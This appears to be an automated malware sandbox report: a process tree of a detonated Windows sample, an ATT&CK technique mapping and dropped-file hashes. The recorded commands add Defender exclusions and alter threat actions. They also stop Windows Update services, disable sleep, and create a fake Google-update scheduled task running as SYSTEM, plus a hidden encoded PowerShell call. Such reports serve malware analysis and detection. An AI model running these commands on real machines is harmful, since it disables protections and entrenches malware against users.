"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:6464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:9888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:1180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:8816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4856

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:10948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:9296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JIEmgPxMErUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JIEmgPxMErUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PKGZUDimdbrU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PKGZUDimdbrU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UcxffrdvJHmmSpnSuqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UcxffrdvJHmmSpnSuqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iiHXcviUU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iiHXcviUU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uhJuiGkseCyjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uhJuiGkseCyjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\EfJogfUadkfyLbVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\EfJogfUadkfyLbVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EynLfSPbPXTmonnj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EynLfSPbPXTmonnj\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:7888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JIEmgPxMErUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:10336

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JIEmgPxMErUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:10892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JIEmgPxMErUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:6412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKGZUDimdbrU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:9304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKGZUDimdbrU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UcxffrdvJHmmSpnSuqR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:8028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UcxffrdvJHmmSpnSuqR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iiHXcviUU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:8956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iiHXcviUU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:10992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uhJuiGkseCyjC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1824

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:8280

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:5384

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:9860

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2836

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:8940

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:2028

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:5872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
1⤵
PID:9328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 396 -ip 396
1⤵
PID:8912

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:9252

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:9804

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:9376

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:9480

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:2752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:7676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7492 -ip 7492
1⤵
PID:4464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:9932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:10084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5784 -ip 5784
1⤵
PID:6428

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\tlxvacrdjkek.xml"
1⤵
- Creates scheduled task(s)
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6372 -ip 6372
1⤵
PID:7764

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:9096

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:10092

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:6388

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:3020

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:2840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7312 -ip 7312
1⤵
PID:6840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
1⤵
PID:6668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5988 -ip 5988
1⤵
PID:6828

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:9844

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6616

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 9032 -ip 9032
1⤵
PID:2788

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:4792

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
1⤵
PID:6832

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Desktop\a\owenzx.exe"
2⤵
PID:1700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
1⤵
PID:8364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5988 -ip 5988
1⤵
PID:7324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5988 -ip 5988
1⤵
PID:6976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
2⤵
PID:8344

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7288

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4824

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\SysWOW64\ipconfig.exe"
1⤵
- Gathers network information
PID:9556

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Desktop\a\isbinzx.exe"
2⤵
PID:7368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 8832 -ip 8832
1⤵
PID:10016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
1⤵
PID:9144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 9016 -ip 9016
1⤵
PID:10592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 10660 -ip 10660
1⤵
PID:10804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 3988 -ip 3988
1⤵
PID:11012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 8864 -ip 8864
1⤵
PID:3108

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:10612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 9104 -ip 9104
1⤵
PID:10360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8340 -ip 8340
1⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:8872

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:10568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 8840 -ip 8840
1⤵
PID:10436

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6080

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:8068

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:7272

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:6264

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:9952

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:1816

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:9776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2436 -ip 2436
1⤵
PID:4912

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\tlxvacrdjkek.xml"
1⤵
- Creates scheduled task(s)
PID:7948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 8296 -ip 8296
1⤵
PID:1288

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:9176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 9252 -ip 9252
1⤵
PID:1012

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:3720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 8956 -ip 8956
1⤵
PID:5392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:8988

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:9400

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5476

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:10228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 9868 -ip 9868
1⤵
PID:8488

C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\SlLSuqM.exe
C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\SlLSuqM.exe pg /fjsite_idmxJ 385118 /S
1⤵
PID:10060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 11004 -ip 11004
1⤵
PID:9736

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7420

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:8136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7028 -ip 7028
1⤵
PID:7576

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\TAudioConverter\XML\Styles\is-9BQT3.tmp
Filesize
1KB

MD5
221ba157195bb134ae34cbaeddfa9551

SHA1
baf50632af37a822f4858eec1635707bdb0bad69

SHA256
7d21a13baf6b38184e7114085f8da50cd7289aec7e915215ddc9a71b565aba32

SHA512
3218944050c2e5795d3134c89dadecc44aba64974d2278e7353e9129406e4d436b8f38fe34ba34f88ad4662777cd59e76cb8696f1e18ef539746972ce0c445a6

Download Submit
C:\Program Files (x86)\TAudioConverter\XML\Styles\is-H63FM.tmp
Filesize
1KB

MD5
34cb1792dade03e203bbdee6ddc39f25

SHA1
284a314107f6518ed18f82eda7854b7afe938758

SHA256
6a0620a8b2a4b091517d40fa23e6a0e892336edf102ae66d3fef61961d7b3aa7

SHA512
5650dc7ff2e9a87e8c8e73d97d0db99d2381401c34115ecebc1d851b55cf50b4d7e11f40cc235bee34dd22ccc324b4f3bd7d02d64fc32767e7170911fbd4be3c

Download Submit
C:\Program Files (x86)\TAudioConverter\XML\Styles\is-H9H67.tmp
Filesize
1KB

MD5
d33d82fd0960077a3c39bf7230500eb6

SHA1
3c3b5a82a9f20cd2a134a92bec4f11ccbebf7674

SHA256
93774cbcea631080363f94ab745c8b2dba0e586c8187a0bafeb303b3d038c970

SHA512
59b766ebc578c91054e39f2ee47b50e3e88d3c7240ac8d5db1cee3ce485a4cf1f42ea7b7d0b170e3d9784ffc59dbfae40748e50739d0ec469c14e96cf7a91635

Download Submit
C:\Program Files (x86)\TAudioConverter\is-2JPOL.tmp
Filesize
102KB

MD5
162238d2f524890b71db24b146b7a238

SHA1
a28d0ab37b156967ea33f7a100f7a83c06998eb7

SHA256
0a4c0a45cb66e945b1c1579735b3b4e2229e4523ba2aae088bc986c35c64acaa

SHA512
d0228ce4cd859a8adcddd0d8cb052bf03d9a07c4c1fc60451f67abe9247f9c6bacecc03d2c1a0cd98035d63d01c899e4765799a4b073cd139b4a705d509803c1

Download Submit
C:\Program Files (x86)\TAudioConverter\is-2U4RD.tmp
Filesize
151KB

MD5
2b25475c24b096e1b7db765bcdb4569e

SHA1
ba950d5c26e88b4b77c61501f2c9277792fb4a76

SHA256
0203323f76ec20391765e33c582ddc901798697b0a3d49df5708fc6f4a2fbcae

SHA512
7c19fc88dc6e99fa81a6fa8d21a46e438d1a80c09e2baedb9d7f9dbd15d5ebcfa4ed13653123a6e5caa466b3035053265a1f4461c8e80236513ba406e01541da

Download Submit
C:\Program Files (x86)\TAudioConverter\is-4U48T.tmp
Filesize
323KB

MD5
84dd03a94e78a3e4d323ddeb1b135863

SHA1
a5bdfd9fe455a1b6bc5735dcde9ee88b290d4f98

SHA256
11cf668d22466b568ee3a3117c3ebeaa5b79179653cc7b19f1d3a45428a5fba0

SHA512
2812bfa7cedb465c222b755b7c949a17bfa8f2534ee3fe4c607783ae55f9bff7ab14b61fd789001ff3d79d70114226991ba53b3bff1b282cb032f921da56dd4f

Download Submit
